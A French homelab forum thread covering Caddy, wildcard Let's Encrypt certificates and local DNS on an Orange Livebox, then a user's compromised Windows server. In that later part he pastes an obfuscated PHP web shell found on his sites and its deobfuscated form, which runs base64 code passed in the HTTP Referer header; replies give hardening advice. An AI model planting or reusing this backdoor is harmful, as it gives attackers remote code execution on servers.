Reprise du message précédent :

Oui bien sûr, j'ai oublié le plus important  

 
Je ne connaissais pas caddy, ça m'a l'air bien sympa coupler dans du docker par exemple.
LXC c'est du jail (FreeBSD) au final ?

C'est similaire oui

XaT

Let's Encrypt supporte désormais les wildcards
 
https://community.letsencrypt.org/t [...] ards/55578

Ah quand même !

Je suis pas calé sur les certificats, quelqu'un peut me dire à quoi ça sert un certificat wildcards ?

 
Tu es full ubuntu ? (pour landscape)
Tu peux expliquer un peu plus le fonctionnement de Caddy ? j'ai du mal à comprendre le plus...
 
Sinon belle infra    

 
Jusqu'à présent il fallait faire des demandes pour des domaines précis (par exemple www.mondomaine.com), les wildcards permettent de faire un certificat pour *.mondomaine.com, ce qui fait que sans changer de certif, tu peux très bien l'utiliser pour www.mondomaine.com ou truc.mondomaine.com

Je comprends bien le principe, mais avec Caddy ou (Traefik pour mon cas), la génération des certificats est automatique, donc ça change rien au quotidien.

Tu utilises AWX/Tower pour ansible ?
 
XaT

 
On n'a pas dit que c'était utile à tout le monde  

 
Je sais mais tu as un exemple d’utilisation ?
Merci pour les réponses  

Chez moi quand je démarre un container docker j'ai la possibilité de lui mettre une option "-e VIRTUAL_HOST=xxxx.mondomaine.com"
Ce qui déclenche automatiquement la création d'un vhost sur nginx avec reverse proxy, etc...
 
Du coup quand je démarre un container sur un nouveau sous-domaine, soit il faut que je mette à jour mon certificat en ajoutant manuellement le sous domaine à la liste, soit j'ai la flemme et j'ai un message d'alerte quand j'arrive sur la page en https. (Sur le dns du domaine -chez ovh, j'ai déjà un wildcard de configuré, donc rien à faire de ce côté là)
 
Maintenant je vais pouvoir faire un certificat avec wildcards et pouvoir faire ce que je veux avec les sous-domaine sans me soucier du dns ou des certif.

Merci  
Je savais pas que l'on pouvais faire ça aussi pour le dns  

Thanks. Full Ubuntu yes, ça permet d'avoir des repo à jour pour 99.9% des produits qu'on cherche à installer.
 
Caddy c'est juste un webserver codé en GO (donc très léger et avec une empreinte système minimale), à la base fait pour des développeurs qui veulent pas se prendre la tête avec une configuration poussée.
 
Tu lances l'exécutable avec un fichier de conf qui décrit ton / tes sites webs et c'est parti.
 
Le fichier de conf est minimaliste, y'a très peu de choses qui doivent être renseignées.
Voici la description d'un site que j'héberge :
 

 
Avec ces 10 lignes j'ai un site complet qui s'update tout seul et que je n'ai pas à maintenir.
Caddy support pas mal de directives HTTP standard et on peut ajouter des modules développés par la communauté très facilement (communication avec fournisseurs dns, gestion de l'authentification, api pour monitoring prometheus, etc)
Comparé à un traefik que tu connais, la marge d'apprentissage est bcp plus faible, et il permet plus de modularité. Mais c'est pas exactement le même type de produit en même temps)
 
En conclusion je dirais que l'intérêt de Caddy c'est de faire ce que tu veux en peu de lignes de codes et sans passer 10h à fouiller le net pour répondre à ton besoin.
 

 
Je suis en train de tester en ce moment, ça m'a l'air génial pour centraliser / planifier les exécutions sans se coltiner des produits tiers complexes.
Si on est déjà à l'aise avec ansible, la courbe de progression avec AWX a l'air nulle pour l'instant. Tu l'utilises en perso / boulot ?    

Merci pour ce retour.  
Je vais tester Caddy, la synchronisation avec un dépôt GIT m'intéresse je vais voir si je peux adapter ça avec un de nos projets.

Salut,

Je sais pas trop où poser ma question, alors je la pose ici.
Je viens récemment de faire l'acquisition d'un nom de domaine, pour faciliter mes échanges avec mon serveur@home (un nas syno, c'est moche, mais ça me suffit ) sur fibre orange, donc sans ip fixe.

Je m'en sers surtout pour du caldav, carddarv, partage audio.

Ca fonctionne très bien avec mes différent appareils (tel et tablette android / appli web) en utilisant la redirection de mon nom de domaine si je suis hors de chez moi.

Par contre, si je suis connecté en local... ça foire, la résolution du ndd ne fonctionne pas a priori.

Il y at-il moyen de corriger ça ?

Soit en bidouillant ton fichier hosts (sur chaque poste), soit en aillant la main sur le serveur DNS local (ce qui n'est pas le cas il me semble avec la box orange), soit en changeant de box pour un routeur qui gère le loopback

Unbound (S.tephane Bor.tzmeyer a un tuto bien fait dessus).
 
Le soucis est de contourner ta box, donc soit tu paramètres les DNS à la main sur tous les appareils, soit tu installes un serveur dhcp et un point d'accès (pointant vers le serveur dhcp, qui lui même pointe vers ton serveur DNS).

ok, merci pour ces pistes

ça n'a pas l'air simple sachant que bidouiller les fichiers hosts sur un appareil android, je sais pas faire et que ça me fais chier de devoir foutre un routeur/serveur dhcp en plus juste pour ça

Oui, et du coup ça voudrait dire que l'appareil ne pourrait pas non plus y accéder quand tu es en dehors du réseau local (vu qu'il essaierai d'y accéder avec l'adresse locale).

Dans ce cas avoir ton propre serveur DNS local me parait la meilleure solution

Sisi, c'est super facile.
 
Pour modifier les DNS sous Android, le plus simple est de configurer le réseau WiFi directement, en cliquant dessus on peut modifier les DNS.
 
Mais il faut le faire pour chaque appareil.
 
Installer un serveur DHCP, ça se fait en 15 minutes avec un Raspberry.

Ok, le mieux est donc effectivement un serveur DNS local (p'tre sur un raspberry). Faut que je m'en procure un
 
Et que je passe en 4G sur mon tel en attendant
 
Merci en tout cas pour votre aide

Y a pas de service DNS disponible sur le Syno ?
 
Perso c'est DNS interne, et la Freebox distribue l'IP du DNS interne via le DHCP > pas besoin de bidouiller sur chaque appareil.
Le DNS interne connait uniquement les quelques adresse fixe de mon lan local, puis forward tout le reste sur un DNS externe.

A priori, si... il y a bien un service de serveur dns sur le syno...faut que je regarde ça de plus près.

Dans l'absolu, la freebox gère le loopback si je me souviens bien, donc même en utilisant le dns général du nom de domaine (qui pointe vers l'ip publique de ta freebox), un poste local devrait être en mesure de joindre le serveur derrière. Mais pas avec une livebox.

L'avantage de cette solution, c'est que le jour où on change de FAI, rien à toucher
A la maison j'ai remplacé les box par un pfsense. Le jour où je change de FAI, je n'ai que la partie connexion WAN à reconfigurer sur pfsense. Tout le reste (services accessible de l'extérieur et reseau local) ne bouge pas. Déjà vécu pour un passage de free à bouygues, aucun soucis.

Je l'avais testé à un moment.
J'ai abandonné l'idée direct, en raison du délai de réponse si le système est en veille.
 
Autant une synchro de photos je me moque de mettre 5 secondes à me connecter au Syno, autant ma première requête DNS j'en ai pas envie.
 
Mais sinon oui, c'est fonctionnel.

Ah oui, effectivement, j'avais pas pensé à ça

Je vais rester tel quel pour le moment... et si je trouve le temps, je verrai si je peux faire ça sur un raspberry qui n'aurait pas de veille.

Sinon je crois que la dernière box orange gère le loopback, à vérifier...

Une petite recherche montre que la lb4 supporterai le loopback

XaT

Pareil, DNS perso avec ses propres règles (domaines publicitaire, FB, etc "bloqués" ) et ndd locaux pour plus de confort .

J'ai besoin de conseils...
Tout à l'heure, en balade sur le disque de mon serveur perso sous windows 2012 je constate que mon espace disque à diminué fortement... je regarde d'où ça via via un treesize... et WTF : un nouveau compte utilisateur a été créé (nommé WAMPserver lol), visiblement un mec s'est logué, a installé Firefox et a téléchargé des iso de jeux pas très légaux !!! A priori un allemand, ça ne ressemble pas trop à un script auto mais à des actions lancées manuellement... étrange.
 
J'ai dégagé le compte et fait le ménage, mais maintenant vient l'heure des questions :
- comment ce truc a t'il été possible ? probablement via RDP mais quand même ? (l'admin a un mot de passe à 12 caractères random, j'ai un compte plus faible [pass a 8 chars] mais avec un username compliqué pas bateau).
 
Mon serveur a des ouvertures vers l'extérieur : ftp, http, https, rdp... et forcément ça en fait une victime toute désignée. Quel serait selon vous le meilleur moyen de le protéger ? Il est derrière une livebox et pour l'instant il y a un NAT direct des ports 21/80/443/3389 vers cette machine.
 
- J'ai besoin de l'accès RDP depuis une ip variable (smartphone en 4G par ex, en wifi en vadrouille chez des amis...) donc je vois 2 solutions :
1/ trouver un moyen de limiter géographiquement les ip autorisées (genre limiter à la France déjà)
2/ mettre en place un VPN, mais là je manque de compétences, des suggestions ?
 
Même chose pour le http (WAMP) : pour certains services j'ai besoin d'un accès direct via le port 80, mais je pourrai en rendre certains moins ouverts, par exemple les ouvrir/fermer ponctuellement, limiter les ips à la France... mais là encore dur de tout verrouiller.
Exemple d'usage courant :
- petite page html récap de ma domotique. Pratique pour savoir si tout va bien lorsque je ne suis pas chez moi (sans avoir à lancer une artillerie lourde).
- site web en cours de développement, interactions avec mes clients (genre "allez voir à votresiteencours.amamaison.com et dites-moi ce que vous en pensez" ). Je ne peux pas leur demander un accès via un VPN, ni leur demander avec quelle ip ils consulteront.
 
Bref, je suis preneur de suggestions (ou tutos) pour verrouiller un peu tout ça. Pour info le serveur c'est un petit Atom J1900 [cpumark 1862] et 8Go de ram, pas de quoi faire tourner plein de VM et whatmille bordels.
 
Big merci par avance.

bah vu que c'est sous le profile de ton wamp j'aurai tendance àd ire qu'il est passé par là. Tes sites web doivent être pourris et permettre de rentrer ou ta domotique

wamp ne tourne pas sous un compte dédié.
c'est juste le nom du compte créé. Mais j'ai un gros doute qu'il y ait un lien entre les deux, probablement un nom pour passer inaperçu...
Après ça peut être une faille d'un site/morceau de site, machin php quelconque ça c'est sûr.

À tout hasard, Drupal ?

nope.
Par contre du wordpress en quantité, modx (une antiquité), dotclear, des devs perso, ... tout ça derrière des sous domaines (qu'il faut connaitre ou aller récupérer auprès de la config complète du nom de domaine).
 
J'ai fait un scan avast, il m'a trouvé 3/4 fichiers php (créés de toute pièces à priori), pour divers sites, mais avec des dates diverses et un contenu obfusqué genre :
 
$func="cr"."eat"."e_fun"."cti"."on";$b374k=$func('$x','ev'.'al'.'("?>".gz'.'in'.'fla'.'te(ba'.'se'.'64'.'_de'.'co'.'de($x)));');$b37....
Après désobfuscation ça donne :
<?php ini_set('error_log', '/dev/null');
parse_str($_SERVER['HTTP_REFERER'], $a);
if (reset($a) == '12' && count($a) == 9) {
    echo '<3456>';
    eval(base64_decode(str_replace(" ", "+", join(array_slice($a, count($a) - 3)))));
    echo '</3456>';
}
Donc en effet ça permet d'intégrer n'importe quoi
 
 
Juste avant l'heure de la création du compte Windows, dans les logs http j'ai un appel à un de ces fichiers (ss.php)  
 
Hum... possible idée d'où les fichiers viennent, j'ai testé quelques plugins/thèmes  wordpress dont je ne suis pas forcément sûr de l'origine... (téléchargés hors espace officiel)
par contre c'est bizarre que j'ai des fichiers à la racine de différents sites... (ce qui peut laisser malgré tout penser à un pb avec Wamp...)
 
Bon reste quand même la problématique de comment verrouiller un peu plus tout ça ?

Déjà la base du bon sens c'est de passer via un VPN pour la prise de contrôle via ssh ou rdp

Ensuite, je ne connais pas wamp, c'est une sorte de apache/php/db cléf en main ? Si c'est ça oublie, passe soit sur iis ou mieux un linux avec apache et les mod qui vont bien

Je te conseille également un truc tout con mais diablement efficace si tu as sur ton serveur web des sites en dev, donc potentiellement faillibles, c'est de passer via un autre port de sortie que le 80 pour éviter les scans automatique. Par exemple, tu donnes comme ip à ton client, site.serveur.com:99 (au pire si t'as un domaine avec un hébergement en datacenter, une iframe et roulaiz). le but est que ton serveur ne réponde pas aux scans auto sur le port 80.

Je conseille toujours de réduire au max la surface d'attaque, avoir 8000 ports et services ouverts alors qu'on peut en avoir un ou deux d'ouvert en passant via un VPN, c'est prendre des risques pour rien

WAMP cest un acronyme pour
Windows
Apache
MySQL
Php

c'est un paquet intégré avec les outils de bases pour la gestion.
Mais il fait rien de plus que chaque éléments géré séparément

Ok, merci
 
Sinon, pourquoi apache sous windows et pas iis ?
Si c'est pour avoir apache, un debian est plus indiquée non ?

Sous debian t'as le petit frère LAMP (linux apache etc )  

 
Htaccess pour les sites de dev avec restriction par IP et/ou login/password.